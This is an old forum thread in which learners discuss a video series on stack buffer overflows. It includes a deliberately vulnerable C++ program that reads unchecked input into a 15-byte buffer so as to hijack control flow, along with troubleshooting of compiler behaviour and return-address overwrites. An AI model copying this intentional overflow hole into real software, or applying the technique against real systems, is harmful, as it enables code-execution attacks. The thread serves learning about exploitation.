You will only understand this if you have watched the first guide to buffer overruns video by IDEspinner. If you haven't seen it then make sure you do!

Ok, so here is the code for the buffer overflow example:

#include <iostream.h>
#include <stdlib.h>
#include <conio.h>
#include <stdio.h>

int Hijack()
{
cout << "This program flow should be HIJACKED!!!";
getchar();
return 0;
}

int Funct1()
{
char var1[15];
cout << &var1 << endl;
cout << "_______________1234567890abcd" << endl;
cout << "Enter name:";
cin >> var1;
cout << var1 << endl;
return 0;
}

int main()
{
Funct1();
getchar();
return 0;
}

However. when I load the .exe into ollydbg the Hijack method does not seem to be present in the file. I even did a string ref search in W32Dasm - it detects all the other strings in the methods, but nothing from the Hijack method.
However, if i reference the Hijack method in the main method then the strings are present and i can see the method in olldbg. So it seems that if the method is not referenced the compiler strips it out because obviously it would never be executed under normal circumstances, which makes sense i suppose as why would you program some code and never reference it.
However, i dont want to place the Hijack method in the main method - because this eliminates the whole point of the exercise. (which is to force execute the Hijack method using buffer overflow technique).
Just wondering if any1 else had come across this? Im using Microsoft Visual C++ 6. Is there some kind of option to prevent a method being stripped out even though its not being referenced?

Cheers

I had some problems finding it also.. but in the end came out it was there ..

Serhat

Strange why W32Dasm doesnt pick up the strings. Will have another proper look through, if i still cant see it im coming back to get an offset from u.

Cheers

If you're using SP2?

That is very wierd that you dont see the int hijack() function, but like the first responder pointed out, he found it eventually. I dont think its likley the compiler did strip out what wasnt referenced, i honestly have never seen that.

This does bring out the fact that you are using msvc++.

I dont know anyone who has managed to pull it off with the vc++ compiler, but that doesnt mean people havent done it.

personally, i recommend for the sake of learning, you just stick with the dev-c++ compiler. its free, the goal here is to learn to do a basic overflow, not to bypass stackguards and such(yet).

But im sure the function is there, if you cant find it at all, jump on irc, i'm always there to help. i have helped numerous people so dont worry about it, just about everyon there would gladly help you.



and kia,
I know for a fact that in sp-2, the return should still get overwritten.

Heh..I got messed up between the VC++ compiler, which we got many complaints about it not working, probably the compiler automatically includes/removes some stuff. And the SP2 which a few people came in and complained about...Most were using Visual C++ as well.

The problem is clear.

U trying compile an Application, which a function never used.
So some compilers, like Dev-Cpp, won't compile unused functions in the EXE File.
Simples said: Some Compilers optimize the Code

Hope this helps :-)

Soooo, but what about IDEspinners third Video Tutorial, overrunning strcpy.

I've some Problems there: Ive compiled the App, showed in IDEspinners Tut3, with Dev-Cpp. if trying to exploit, it allway be fail, becouse the RETN jump is always wrong and the Stack addresses are very low, somebody can help me ?

here some photos about my problem:
http://mitglied.lycos.de/intuz/images/fail...loit_strcpy.gif
http://mitglied.lycos.de/intuz/images/fail...oit_strcpy1.gif

Well InTuZ, your problem was a unique one, i wish i could tell ya whats wrong but honestly i dont know.

I compiled all of it with dev-c++ aswell...

I know dev-c++ doesnt optimize code and remove functions, if they did, you could include every header file on startup and not worry about the size of the app.

And the second picture, you said you got
im not sure how to explain, it should in theory end in \x00 since your variables end in null right?

At first i thought its ok, 20 becuase your not overwriting the last byte, but the variable that overwrites should end in null shouldnt it???

Anyone who could explain this would help me out alot.

What is this exploit ???
:s

yo IDEspinner ,
yes of couse it should jump to 00FFFFFF, but it doesnt. although i put in the right retn in the exploit source ("\xFF\xFF\xFF\x00")

So. and Dev Cpp v.4.9.x "removes" (or wont compile in) functions are unused. but u can fix the problem, by using it's function simple, hu

But what da hell, i cant jump to the right place of retn address. And IDEspinner, can u explain me plz exactly what iam trying to exploit in your tutorial ? the strcpy command, or where/how does the overrun starts.?.
sorry for my english, i hope somebody understand it

Well for the first tutorial, you just are learning the basics of a buffer overflow, what makes it possible. Overwriting the return address and overtaking the flow of the program.

The second one goes over coding and that you can put your code into a variable with nothing but \x90 and such.

The final one ties them both together and you put the code in a variable and send it to the program overwriting the return and completly finishing an exploit that could be valid in real life, well not in windows. Actually you would be sending your code and exploit over winsock rather than the command line, so the concept is still there